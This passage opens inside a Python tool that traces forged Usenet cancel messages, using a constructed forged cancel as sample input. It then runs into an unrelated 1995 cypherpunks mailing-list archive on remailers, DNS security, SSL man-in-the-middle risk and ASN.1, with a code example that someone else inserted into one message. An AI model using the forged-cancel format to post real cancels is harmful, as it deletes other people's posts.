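        target = cancelled_id(msg)
        if target:
            groups[target].append(msg)
    reports, per_site = defaultdict(list), defaultdict(int)
    for target, msgs in groups.items():
        paths = [m.get("Path", "") for m in msgs]
        recipients = []
        for m in msgs:
            recipients += [a for a in report_addresses(m) if a not in recipients]
        for addr in recipients:
            site = addr.partition("@")[2]
            if addr in opted_out or site in opted_out or per_site[site] >= MAX_PER_SITE:
                continue
            per_site[site] += 1
            reports[addr].append({"cancelled": target, "paths": paths,
                                  "common_tail": common_tail(paths)})
    return dict(reports)


def constructed_cancel(path, target="<orig-1@example.org>"):
    """Constructed sample cancel (not real traffic); its From: line is forged."""
    return ("Path: " + path + "\n"
            "From: victim@example.org (A. Victim)\n"
            "Sender: news@relay.example\n"
            "Control: cancel " + target + "\n"
            "Message-ID: <cancel." + target[1:] + "\n"
            "\n"
            "cancelled\n")


# The same forged cancel as seen by three constructed watchers w1, w2, w3.
SAMPLE_FORWARDED = [
    watcher_forward(constructed_cancel(w + "!" + rest), w)
    for w, rest in [
        ("w1", "backbone-a.example!hub.example!forger.example!not-for-mail"),
        ("w2", "backbone-b.example!hub.example!forger.example!not-for-mail"),
        ("w3", "backbone-c.example!transit.example!hub.example!forger.example!not-for-mail"),
    ]
]

if __name__ == "__main__":
    for addr, items in catalogue(SAMPLE_FORWARDED).items():
        for item in items:
            print(addr, item["cancelled"], "entered via", item["common_tail"])
```

The shared right-hand hops only narrow down where the cancel entered the net; hops to the right of the true injection site can themselves be forged.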




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 2 Oct 95 06:50:39 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510021350.GAA12393@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk";
$remailer{"wmono"} = "<wmono@spook.alias.net> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

News: the remailer list has been rewritten, and the new version is
live! It should be more accurate, reliable, and faster than before.

Penet is back up! Enjoy.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
syrinx   syrinx@c2.org                    --+-+++----+    52:32 100.00%
ecafe    remail@ecafe.org                 *--********#     7:37  99.99%
alumni   hal@alumni.caltech.edu           *##*#**+#*##     2:47  99.99%
hacktic  remailer@utopia.hacktic.nl       *********+**     9:56  99.98%
gondolin mixmaster@gondolin.org           --+****+*--+  2:04:31  99.98%
robo     robo@c2.org                      #+###**+#*##      :59  99.98%
replay   remailer@replay.com              +**+*-++*++*    11:35  99.95%
bsu-cs   nowhere@bsu-cs.bsu.edu           #*#+###***-#     8:29  99.95%
mix      mixmaster@remail.obscura.com     -++---+---++  1:35:11  99.94%
flame    remailer@flame.alias.net         *****++**+**    23:08  99.93%
portal   hfinney@shell.portal.com         ##  ##*+#*##     2:03  99.79%
crown    mixmaster@kether.alias.net       ---+ --+-+-   1:18:05  99.70%
ideath   remailer@ideath.goldenbear.com   -.-.---.---  10:24:01  99.68%
extropia remail@extropia.wimsey.com       -.---.-----   8:06:45  99.54%
rmadillo remailer@armadillo.com           ++ +++++ ++     43:52  99.08%
vishnu   mixmaster@vishnu.alias.net         *+--*+ +**    20:36  98.79%
c2       remail@c2.org                      ++++++ +++    47:07  98.74%
spook    remailer@spook.alias.net         -----------   3:27:18  98.64%
penet    anon@anon.penet.fi               - ++-++--++   2:43:34  98.63%
hroller  hroller@c2.org                   #+###*   **#      :57  92.70%
rahul    homer@rahul.net                  **#****+###      2:05  99.52%
wmono    wmono@spook.alias.net                    ****     7:37  87.49%
ford     remailer@bi-node.zerberus.de     **+*#***+        6:37  68.05%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kerowe@ncsa.uiuc.edu (Kenneth E. Rowe)
Date: Mon, 2 Oct 95 06:16:32 PDT
To: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Subject: Re: DNS Security ( was Re: NetScape's dependence upon RSA down...)
Message-ID: <v02130502ac95bfa167d5@[141.142.150.60]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:58 PM 10/1/95, Donald E. Eastlake 3rd wrote:
>DNS security is an important point.  People not aware of efforts in this
>area may want to check out draft-ietf-dnssec-secext-05.txt which has
>more or less passed working group last call and is being considered by
>the Security Area Directory / IESG.  Reference code is also available
>(see message pasted at end below).
>
>Donald

But the proposed DNS extension itself does not deal with CRL and Key
Compromise Lists.

Ken.

-------------------------------------------------------------
Kenneth E. Rowe  (kerowe@ncsa.uiuc.edu)
Senior Security Engineer                (217) 244-5270 (Office)
        / Security Coordinator          (217) 244-0710 (NCSA IRST)
National Center for Supercomputing Applications
*** email ncsa-irst@ncsa.uiuc.edu for computer incident response ***






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 2 Oct 95 05:49:37 PDT
To: cypherpunks@toad.com
Subject: SAI_cya
Message-ID: <199510021249.IAA07948@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-2-95. W$Japer:


   "Internet Users Spooked About Spies' New Role."

      Web Review reported last week that the company in charge
      of assigning domain names, Network Solutions Inc., had
      been acquired by Science Applications International
      Corp., a closely held company which has many former
      intelligence and defense officials on its board. Web
      Review raised questions about whether SAIC is acting as
      camouflage for the government. Users of the Internet,
      which was originally created as a communications medium
      for Defense Department researchers, are reacting to the
      news with hostility. "I don't want a spook corporation,
      particularly a private spook corporation, to be anywhere
      near a control point on the global cooperative
      Internet," says James Warren.


   SAI_cya  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Mon, 2 Oct 95 09:19:56 PDT
To: Don.Stephenson@Eng.Sun.COM
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510021608.AA08689@pepper.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain


Don wrote:

>I haven't read the SSL spec for a while but my understanding was that 
>the server passed its public key to the client via a certificate 
>signed by a mutually trusted certificate authority (i.e., Verisign).
>
>How would the filter be able to forge such a certificate ?

Why forge it? Why not simply buy a netsite server with a valid certificate.
Let's say you paid full list for it $5000. It is the classic MITM attack
but the protection against that attack was generally that the parties
communicating "knew" each other. 

This is a fundamental weakness of putting the security at the SSL level as
opposed to a possibly higher level. With the netscape attack since your
client never cares "how" (or to whom) the SSL connection is made, it never
shows you the information about where the source key came from. Only that
it is valid.

--Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 2 Oct 95 09:19:04 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top stor
In-Reply-To: <Pine.SUN.3.90.951002104231.23045A-100000@dfw.net>
Message-ID: <199510021614.JAA19159@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	C2 status isn't worth anything. NT might be one of the only
OSes that ship C2-compliant, but just because it is C2 doesn't mean
it is secure.

> 
> BTW, I was just reading in LAN TIMES, I think, that Microsoft NT 3.5 is 
> about to be given C2 status from the NCSC. They stated that it took over 
> a year to pass it. They also mention that Novell Netware is going through the 
> same tests and it should have its C2 status in about 6 months to a year.
> Thought you would like to know.
> 
> Aleph One / aleph1@dfw.net
> http://underground.org/
> KeyID 1024/948FD6B5 
> Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Mon, 2 Oct 95 01:27:02 PDT
To: cypherpunks@toad.com
Subject: Re: VISA and Microsoft STT Specs available
In-Reply-To: <199509291902.MAA23808@ix8.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.951002092117.12900A-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Sep 1995, Bill Stewart wrote:

> Some cryptographic high points, from a brief scan.
> - 1024-bit RSA signatures, using PKCS#1 format.
> - SHA 160-bit hashes
> - Symmetric bulk crypto includes two options (I haven't yet seen
>   how you choose between them; I assume it's export/domestic?)
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>   == RC4/64 with 24 bits of salt leaving 40 bits of real key
>   == DES-CBC - yes, that's single-DES.  IV=0.

From http://www.windows.microsoft.com/windows/ie/stt.htm:

  NOTE: this document covers the International version of the STT 
  protocol, which includes DES encryption of all financial data, direct 
  RSA encryption of bank card account numbers, and 40 bit RC4 encryption 
  of the purchasing order form contents and receipt.  A US/Canada version 
  of the protocol with triple-DES encryption of the order, receipt, and 
  all financial data and direct RSA encryption of bank card account 
  numbers will be documented and published in the near future.

So it looks like single DES is now OK for export, at least it seems to be 
in this case where its application is strictly limited to "financial data".


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Oct 95 09:22:41 PDT
To: cypherpunks@toad.com
Subject: Re: Yet Another "(Fwd) Internet  Euro-Clipper"
Message-ID: <ac955e3205021004cb23@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:20 PM 10/2/95, Peter Trei wrote:

>For those curious about the latency, I'm posting this at 12:08, on the US
>east coast.
>How long did it take to reach you?

I got it at 09:14, Pacific Daylight Time, so there appears to be no lag.

I've generally found that lags are on my end, that my system (got.net
currently) is delaying mail from _all_ or _most_ mailing lists. (This was
particularly the case last week, when Cypherpunks mail stopped for many
hours at a time, then arrived out of sequence when my ISP was (presumably)
able to receive the resent mail.)

>> Not to pick on Peter Trei, as this happens all the time, whenever a hot
>> issue appears.
>
>Short of implementing some content-sensitive form of CSMA/CD, I don't see
>what we can do (but lowering the list latency would help a lot).

Well, the main issue with the "Europe to Ban Crypto" reposts was that
several people reposted the same press release over a period of several
days, and the case I cited here was  where it was posted a week later. I
can't see how a latency, even a serious latency of several hours, could
cause this to happen.

Mostly I think people should try to first of all, _write original stuff_.
That is, write their own analyses of things. Their own essays, reactions,
etc. Then, secondarily, post pointers to longer stuff. Thirdly, and less to
be desired, forward articles.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 2 Oct 95 06:48:42 PDT
To: cypherpunks@toad.com
Subject: Re: Restrictions on Munitions _Imports_
In-Reply-To: <ac94bc7800021004cb78@[205.199.118.202]>
Message-ID: <m0szlG7-0004MhC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

: I don't expect that any specific _crypto_ import licenses exist, but
: certainly various kinds of _munitions_ import licenses exist (improperly,
: in my opinion, of course).
. . . . 
: Given that crypto is classified as "munitions" for the purpose of export
: control (including the ITARs), it would not surprise me in the least if the
: same sorts of restrictions on imports of the aforementioned munitions are
: not applied to at least some crypto imports. If not now, soon. (Given that
: many folks are talking about a strategy that has been apparent for many
: years: develop core crypto in less hostile environments than the U.S.)
: 
: I can't cite a specific law affecting crypto imports at this time--and I
: doubt any crypto products have been affected so far--but clearly there are
: restrictions on imports of ammunition, guns, missiles, jet fighters,
: and--maybe soon--on "crypto munitions."

There is a United States Munitions List for imports that is
administered by the Treasury Department, but cryptographic devices and
software are not included on that list.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Oct 95 09:38:23 PDT
To: cypherpunks@toad.com
Subject: My goof on toad.com lags...
Message-ID: <ac9562b109021004d9db@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


A few minutes ago I wrote:

---

At 12:20 PM 10/2/95, Peter Trei wrote:

>For those curious about the latency, I'm posting this at 12:08, on the US
>east coast.
>How long did it take to reach you?

I got it at 09:14, Pacific Daylight Time, so there appears to be no lag.

---

Well, before you all correct me, yes, I now realize it was my copy, sent
directly to me, that I received.

As of 09:35 I haven't received the toad.com-delivered copy.

But my point remains that many times the lags are on local ISP systems, not
necessarily on toad.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 2 Oct 95 08:52:45 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <199510012022.OAA07852@nag.cs.colorado.edu>
Message-ID: <aPkccD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce Wilcox <wilcoxb@nag.cs.colorado.edu> writes:
> I've had a look at the web site and it looks really interesting.  It would
> make a great project if a bunch of cypherpunks installed NoCeM and then piped
> the list to a newsgroup.  We could then develop reputation servers to help us
> use NoCeM, start charging cyberbucks for our recommendations, and, in short,
> make cpunks into a slightly larger outpost in Cyberlibertaria.  (a.k.a. The
> Free Net)

This sounds like a very good idea to me too. 

:)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 2 Oct 95 10:13:58 PDT
To: Carl Ellison <cme@tis.com>
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510021713.KAA15419@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott M Fabbri <m1smf99@FRB.GOV>
Date: Mon, 2 Oct 95 07:18:31 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Debt currency
In-Reply-To: <199509300658.XAA03050@blob.best.net>
Message-ID: <9510021419.AA06092@arcss5.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain


> In addition to being totally off topic and spamming lots of lists, 
> Terra Libra is selling Ponzi schemes and pyramid schemes.
> 
> This is just "make money fast" elaborately dressed in libertarian
> rhetoric.
> 
> 
> At 07:11 AM 9/28/95 +0100, Anonymous wrote:
> >   This is the best description of debt currency I've seen. Debt currency
> >is today's most effective form of slavery. It is today's American slavery.

Well, I got a kick out of it. Too bad it's mostly wrong. :-)

--
Scott Fabbri                                  m1smf99@frb.gov
I don't speak for the Federal Reserve Board. Mr. Greenspan does, and we're 
both pretty happy about the status quo.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 2 Oct 95 07:33:50 PDT
To: cypherpunks@toad.com
Subject: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <9510021434.AA14336@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


See http://nytsyn.com/live/Lead/275_100295_074418_19095.html

  MICROSOFT BECOMES NEW TARGET OF HACKING CHALLENGE (10/2) 

  By HEATHER GREEN c.1995 Bloomberg Business News 

  BERKELEY, Calif. -- Microsoft Corp. has been chosen as a new target
  for computer hackers.

  Community Connexion, an Internet service provider that last week
  promised a free T-shirt to anyone who found a flaw in Netscape
  Communications Corp.'s software, extended the challenge Friday to
  include holes in Microsoft products.

  . . .

The article quotes Sameer and includes the URL http://www.c2.org/hackmsoft/

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 2 Oct 95 08:47:23 PDT
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
In-Reply-To: <9510021434.AA14336@cfdevx1.lehman.com>
Message-ID: <Pine.SUN.3.90.951002104231.23045A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


BTW, I was just reading in LAN TIMES, I think, that Microsoft NT 3.5 is 
about to be given C2 status from the NCSC. They stated that it took over 
a year to pass it. They also mention that Novell Netware is going through the 
same tests and it should have its C2 status in about 6 months to a year.
Thought you would like to know.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 08:15:50 PDT
To: stewarts@ix.netcom.com
Subject: Re: X.509, S/MIME, and evolution of PGP
In-Reply-To: <199509292140.OAA27151@comsec.com>
Message-ID: <9510021511.AA10057@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 27 Sep 1995 15:22:08 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>

Bill,

>I'd always heard X.509 public key certificates were a hierarchical, evil,
>anti-WebOfTrust ISOism.  But Netscape is now doing them, and talking S/MIME,
>so I sat down to read the specs, and they're really not all that bad.  

I was all set to scream, when I read this first sentence.  Then I read on.

>(Technically, I've only read PKCS#6 and RFC 1422, and not the real ISOisms...)
>Yeah, they've got lots of clunky ASN.1 Ambiguous Encoding Rules and X.500 
>Silly Name Format, but those can be lived with, and the X.500 may be possible
>to simply ignore in most cases.

At this point, I realized that we agree in evaluation but not in weighting.

Twice now, I have had to deal with X.509 certificates in real code and it
is excruciatingly painful -- especially for someone, like me, with some
background in performance engineering and much background in software
engineering.

ASN.1 is not merely ambiguous, it is actively wrong as part of a design
methodology.  It encourages people to define structures in the BNF style --
and they do (witness X.509).  When you translate this into C or PASCAL
structures by an automatic translator, you end up with structures whose
definitions are nested so deeply that even with short field names you would
have variable names which occupy a substantial part of a line of text.
However, ASN.1's BNF-ness encourages people to use
longNamesWithEmbeddedCapitals -- so you end up with variable names which
turn routine C function calls into multi-line, unreadable blocks.

You also end up with too much code.  I recently had to deal with X.509
certs for an authentication application (a firewall proxy).  The proxy was
about 30KB of code prior to the ASN.1.  The ASN.1 code, just to do packing
and parsing, was over 100KB (.o file sizes, in both cases).

You also end up with too many bytes being transferred.  I worked out an
example of ASN.1 abuse -- defining a triple-DES key structure for
encrypting and transmittal -- as a raw C structure (following long
established practice and performance engineering (an array of unsigned
char, with offsets for each key and the IV)) and as ASN.1 (following modern
ASN.1 practice).  The raw C structure was 32 bytes long.  The ASN.1
structure was 86 bytes.  Worse was the code dedicated to structure
definition and packing/unpacking.  In the raw C case, it took 48 ASCII
characters to define the structure and its offsets (including comments) and
nothing to pack/unpack.  With ASN.1, it took 55085 characters of
definition, pack and unpack code.  This is a factor of 1148 in source code
expansion.

		--------------------------------

I could go on at length, and have in other fora.  Not only is ASN.1 clearly
the work of Satan, the Distinguished Name definition is more than a victim
of ASN.1 generality, it is a clear reason for the unpopularity of systems
which use it.  Do you remember when X.400 names started showing up in
e-mail (e.g., with Lotus Notes)?  How many of those names do you see now?
It didn't work.  The concept is flawed -- but it lives on in X.509.  [It
reminds me of a flaky grad student's idea of a way to do things -- elevated
to standard before people had the chance to try it and discover how
completely bogus it was.]


It is possible to implement something which reads and writes ASN.1 -- but
it is ugly, it inflates your code and it hurts your runtime.  I would like
to see as many hold-outs against ASN.1 and Distinguished Names as possible.

PGP is one such.  TIS/MOSS has learned its lesson (from PEM days) and is
making all of the ASN.1 and DN stuff (X.509) optional.  With luck, the
X.509 parts will die away (although MOSS was retarded so strongly in the
PEM days that it may never recover -- may never acquire the market share to
make it a force).  I would strongly encourage others to join the battle.

This might not be easy.  It is clear that there is an ASN.1 juggernaut.  It
is taking over all sorts of standards.  I believe I know why.  It makes the
job of the standards writer easier.  However, I also believe it needs to be
fought...not merely to save future S/W development efforts from the waste
and abuse which ASN.1 creates, but also to take a stand against the process
by which non-implementors get together on standards committees and come out
with standards which preclude good software architectures -- and who, in a
kind of old-boy-network, endorse other standards (e.g., the ISO set) as
part of their own.  Such a design process is destructive.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+
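
The triple-DES key comparison in the message above, as an added example that is not Carl Ellison's code. The ASN.1 type used here (a SEQUENCE of four 8-byte OCTET STRINGs, DER-encoded) is an assumption and the smallest plausible one, so it comes to 42 bytes rather than the 86 he measured for his own definition; the offsets and function names are likewise illustrative.

```python
# Fixed-offset layout: three 8-byte DES keys followed by an 8-byte IV.
OFF_K1, OFF_K2, OFF_K3, OFF_IV, RAW_LEN = 0, 8, 16, 24, 32
FIELD_LEN = 8
TAG_SEQUENCE, TAG_OCTET_STRING = 0x30, 0x04


def pack_raw(k1, k2, k3, iv):
    """Raw form: concatenation at fixed offsets, no framing at all."""
    if any(len(p) != FIELD_LEN for p in (k1, k2, k3, iv)):
        raise ValueError("each field must be 8 bytes")
    return k1 + k2 + k3 + iv


def unpack_raw(buf):
    """One length check is the entire parser for the raw form."""
    if len(buf) != RAW_LEN:
        raise ValueError("raw key block must be exactly 32 bytes")
    return (buf[OFF_K1:OFF_K2], buf[OFF_K2:OFF_K3],
            buf[OFF_K3:OFF_IV], buf[OFF_IV:RAW_LEN])


def der_length(n):
    """DER definite length: short form below 128, else minimal long form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag, content):
    return bytes([tag]) + der_length(len(content)) + content


def pack_der(k1, k2, k3, iv):
    """Assumed type: SEQUENCE { k1, k2, k3, iv  OCTET STRING (SIZE(8)) }."""
    fields = b"".join(der_tlv(TAG_OCTET_STRING, p) for p in (k1, k2, k3, iv))
    return der_tlv(TAG_SEQUENCE, fields)


def read_tlv(buf, pos, want_tag):
    """Read one TLV at pos; every attacker-controlled length is bounds-checked."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    if tag != want_tag:
        raise ValueError("unexpected tag")
    pos += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("indefinite or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        if length < 0x80 or buf[pos] == 0:
            raise ValueError("non-minimal length encoding")
        pos += n
    if pos + length > len(buf):
        raise ValueError("length overruns buffer")
    return buf[pos:pos + length], pos + length


def unpack_der(buf):
    """Strict parse of the assumed type; rejects trailing or missized data."""
    body, end = read_tlv(buf, 0, TAG_SEQUENCE)
    if end != len(buf):
        raise ValueError("trailing bytes after SEQUENCE")
    parts, pos = [], 0
    while pos < len(body):
        part, pos = read_tlv(body, pos, TAG_OCTET_STRING)
        parts.append(part)
    if [len(p) for p in parts] != [FIELD_LEN] * 4:
        raise ValueError("expected four 8-byte fields")
    return tuple(parts)


# Constructed sample key material (not real keys).
SAMPLE = (bytes(range(0, 8)), bytes(range(8, 16)),
          bytes(range(16, 24)), bytes(range(24, 32)))

if __name__ == "__main__":
    print("raw:", len(pack_raw(*SAMPLE)), "bytes")
    print("DER:", len(pack_der(*SAMPLE)), "bytes")
```

Even this minimal type adds two bytes of tag and length per field plus a length-validating parser, which is where the extra code and the extra failure modes come from.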





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Dittrich <dittrich@cac.washington.edu>
Date: Mon, 2 Oct 95 11:17:56 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
Message-ID: <9510021817.AA01271@red2.cac.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Perry writes, regarding alpha decay counts for random numbers:
> 
> > And, as I noted, there are RS232 interfaceable radiation detectors you
> > can buy off the shelf -- no hardware hacking needed.
> 
> As far as a radiation source goes, the Americium 241 source from a cheap
> smoke detector is just dandy. A while ago, I took one into the lab and
